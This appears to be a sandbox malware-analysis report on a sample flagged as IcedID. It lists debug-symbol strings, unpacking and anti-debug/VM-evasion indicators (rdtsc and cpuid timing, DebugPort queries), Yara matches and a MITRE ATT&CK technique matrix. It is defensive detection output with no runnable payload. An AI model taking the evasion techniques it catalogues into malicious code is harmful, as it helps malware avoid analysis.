          Source: Binary string: profapi.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: fltLib.pdbv source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
          Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000011.00000003.373470183.0000000004EC1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.392291844.0000000004CA1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.416079337.0000000005311000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.441828979.0000000005681000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.462365505.00000000056A1000.00000004.00000001.sdmp
          Source: Binary string: bcrypt.pdbR source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
          Source: Binary string: sechost.pdb source: WerFault.exe, 00000011.00000003.373517949.0000000004FC0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.392471616.0000000004C70000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416196678.00000000052E0000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441883039.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462446132.0000000005670000.00000004.00000040.sdmp
          Source: Binary string: propsys.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: webio.pdbr source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
          Source: Binary string: ncryptsslp.pdb source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: wmswsock.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: wUxTheme.pdb: source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
          Source: Binary string: cfgmgr32.pdb^ source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
          Source: Binary string: fltLib.pdbX source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
          Source: Binary string: msasn1.pdb_ source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: cfgmgr32.pdbF source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
          Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: powrprof.pdbj source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
          Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: webio.pdb< source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
          Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000011.00000003.373517949.0000000004FC0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.392471616.0000000004C70000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416196678.00000000052E0000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441883039.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462446132.0000000005670000.00000004.00000040.sdmp
          Source: Binary string: ws2_32.pdb0 source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
          Source: Binary string: combase.pdbk source: WerFault.exe, 00000011.00000003.373522458.0000000004FC5000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391461414.0000000004C72000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416001893.00000000052E2000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441781418.0000000005772000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462324420.0000000005672000.00000004.00000040.sdmp
          Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
          Source: Binary string: ws2_32.pdb9 source: WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp
          Source: Binary string: wuser32.pdb source: WerFault.exe, 00000011.00000003.373470183.0000000004EC1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.392291844.0000000004CA1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.416079337.0000000005311000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.441828979.0000000005681000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.462365505.00000000056A1000.00000004.00000001.sdmp
          Source: Binary string: crypt32.pdb source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\sample4.exeUnpacked PE file: 0.2.sample4.exe.d0000.0.unpack .text:ER;.data:W;.idata:R;.gfids:R;.giats:R;.tls:W;.rsrc:R;.reloc:R; vs .text:ER;bss:W;.rdata:R;.reloc:R;
          Detected unpacking (overwrites its own PE header)Show sources
          Source: C:\Users\user\Desktop\sample4.exeUnpacked PE file: 0.2.sample4.exe.d0000.0.unpack
          Source: C:\Users\user\Desktop\sample4.exeCode function: 0_2_000D1ECF wsprintfW,LoadLibraryA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,GetProcessHeap,GetProcessHeap,HeapFree,0_2_000D1ECF
          Source: sample4.exeStatic PE information: section name: .giats
          Source: C:\Users\user\Desktop\sample4.exeCode function: 0_2_002496F8 push ecx; ret 0_2_0024970B
          Source: C:\Users\user\Desktop\sample4.exeCode function: 0_2_00249856 push ecx; ret 0_2_00249869
          Source: C:\Windows\SysWOW64\WerFault.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
          Source: C:\Users\user\Desktop\sample4.exeCode function: 0_2_000D18E0 SwitchToThread,__aulldiv,0_2_000D18E0
          Source: C:\Users\user\Desktop\sample4.exeCode function: 0_2_000D18E0 rdtsc 0_2_000D18E0
          Source: C:\Users\user\Desktop\sample4.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-26757
          Source: C:\Users\user\Desktop\sample4.exeAPI coverage: 8.6 %
          Source: C:\Users\user\Desktop\sample4.exe TID: 1180Thread sleep time: -150000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\sample4.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\sample4.exeCode function: 0_2_00125BE6 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,0_2_00125BE6
          Source: C:\Users\user\Desktop\sample4.exeCode function: 0_2_00116FA9 GetEnvironmentVariableW,GetSystemInfo,FindFirstChangeNotificationW,GetEnvironmentVariableW,0_2_00116FA9
          Source: WerFault.exe, 00000011.00000002.378751405.0000000004C30000.00000002.00000001.sdmp, WerFault.exe, 00000015.00000002.400669986.0000000002C90000.00000002.00000001.sdmp, WerFault.exe, 00000019.00000002.423433375.0000000004FA0000.00000002.00000001.sdmp, WerFault.exe, 00000020.00000002.447854535.0000000005A10000.00000002.00000001.sdmp, WerFault.exe, 00000023.00000002.469042458.0000000005470000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: WerFault.exe, 00000011.00000002.378751405.0000000004C30000.00000002.00000001.sdmp, WerFault.exe, 00000015.00000002.400669986.0000000002C90000.00000002.00000001.sdmp, WerFault.exe, 00000019.00000002.423433375.0000000004FA0000.00000002.00000001.sdmp, WerFault.exe, 00000020.00000002.447854535.0000000005A10000.00000002.00000001.sdmp, WerFault.exe, 00000023.00000002.469042458.0000000005470000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: WerFault.exe, 00000011.00000002.378751405.0000000004C30000.00000002.00000001.sdmp, WerFault.exe, 00000015.00000002.400669986.0000000002C90000.00000002.00000001.sdmp, WerFault.exe, 00000019.00000002.423433375.0000000004FA0000.00000002.00000001.sdmp, WerFault.exe, 00000020.00000002.447854535.0000000005A10000.00000002.00000001.sdmp, WerFault.exe, 00000023.00000002.469042458.0000000005470000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: WerFault.exe, 00000011.00000002.378751405.0000000004C30000.00000002.00000001.sdmp, WerFault.exe, 00000015.00000002.400669986.0000000002C90000.00000002.00000001.sdmp, WerFault.exe, 00000019.00000002.423433375.0000000004FA0000.00000002.00000001.sdmp, WerFault.exe, 00000020.00000002.447854535.0000000005A10000.00000002.00000001.sdmp, WerFault.exe, 00000023.00000002.469042458.0000000005470000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\sample4.exeAPI call chain: ExitProcess graph end nodegraph_0-26731
          Source: C:\Users\user\Desktop\sample4.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\sample4.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\sample4.exeCode function: 0_2_000D18E0 rdtsc 0_2_000D18E0
          Source: C:\Users\user\Desktop\sample4.exeCode function: 0_2_0024F646 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0024F646
          Source: C:\Users\user\Desktop\sample4.exeCode function: 0_2_001183DE OutputDebugStringA,GetLastError,0_2_001183DE
          Source: C:\Users\user\Desktop\sample4.exeCode function: 0_2_000D1ECF wsprintfW,LoadLibraryA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,GetProcessHeap,GetProcessHeap,HeapFree,0_2_000D1ECF
          Source: C:\Users\user\Desktop\sample4.exeCode function: 0_2_0025D81F mov eax, dword ptr fs:[00000030h]0_2_0025D81F
          Source: C:\Users\user\Desktop\sample4.exeCode function: 0_2_00259EEC mov eax, dword ptr fs:[00000030h]0_2_00259EEC
          Source: C:\Users\user\Desktop\sample4.exeCode function: 0_2_0028FB73 mov eax, dword ptr fs:[00000030h]0_2_0028FB73
          Source: C:\Users\user\Desktop\sample4.exeCode function: 0_2_0028FB73 mov eax, dword ptr fs:[00000030h]0_2_0028FB73
          Source: C:\Users\user\Desktop\sample4.exeCode function: 0_2_0028F73F push dword ptr fs:[00000030h]0_2_0028F73F
          Source: C:\Users\user\Desktop\sample4.exeCode function: 0_2_013004FD mov eax, dword ptr fs:[00000030h]0_2_013004FD
          Source: C:\Users\user\Desktop\sample4.exeCode function: 0_2_013004FD mov eax, dword ptr fs:[00000030h]0_2_013004FD
          Source: C:\Users\user\Desktop\sample4.exeCode function: 0_2_013000C9 push dword ptr fs:[00000030h]0_2_013000C9
          Source: C:\Users\user\Desktop\sample4.exeCode function: 0_2_000D121E GetCommandLineA,StrStrIA,StrToIntA,GetTempPathA,wsprintfA,GetProcessHeap,HeapFree,0_2_000D121E
          Source: C:\Users\user\Desktop\sample4.exeCode function: 0_2_0024F646 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0024F646
          Source: C:\Users\user\Desktop\sample4.exeCode function: 0_2_002498CA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_002498CA
          Source: sample4.exe, 00000000.00000002.572528127.0000000001CB0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: sample4.exe, 00000000.00000002.572528127.0000000001CB0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: sample4.exe, 00000000.00000002.572528127.0000000001CB0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: sample4.exe, 00000000.00000002.572528127.0000000001CB0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\sample4.exeCode function: 0_2_000D18E0 cpuid 0_2_000D18E0
          Source: C:\Users\user\Desktop\sample4.exeCode function: 0_2_000D1DD9 wsprintfW,GetComputerNameExA,GetUserNameA,wsprintfW,wsprintfW,wsprintfW,0_2_000D1DD9
          Source: C:\Users\user\Desktop\sample4.exeCode function: 0_2_0025BCE8 GetTimeZoneInformation,0_2_0025BCE8
          Source: C:\Users\user\Desktop\sample4.exeCode function: 0_2_00131386 RegisterClipboardFormatW,RegisterClipboardFormatW,RegisterClipboardFormatW,RegisterClipboardFormatW,RegisterClipboardFormatW,RegisterClipboardFormatW,SendMessageW,__EH_prolog3_GS,GetVersionExW,_wcschr,0_2_00131386

          Stealing of Sensitive Information:

          barindex
          Yara detected IcedIDShow sources
          Source: Yara matchFile source: Process Memory Space: sample4.exe PID: 2100, type: MEMORY
          Yara detected IcedIDShow sources
          Source: Yara matchFile source: 00000000.00000003.362692606.0000000001320000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.sample4.exe.d0000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected IcedIDShow sources
          Source: Yara matchFile source: Process Memory Space: sample4.exe PID: 2100, type: MEMORY
          Yara detected IcedIDShow sources
          Source: Yara matchFile source: 00000000.00000003.362692606.0000000001320000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.sample4.exe.d0000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API2Path InterceptionProcess Injection2Virtualization/Sandbox Evasion2Input Capture11System Time Discovery1Remote ServicesInput Capture11Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection2LSASS MemoryQuery Registry1Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerSecurity Software Discovery151SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSVirtualization/Sandbox Evasion2Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing2LSA SecretsProcess Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsAccount Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Owner/User Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowFile and Directory Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
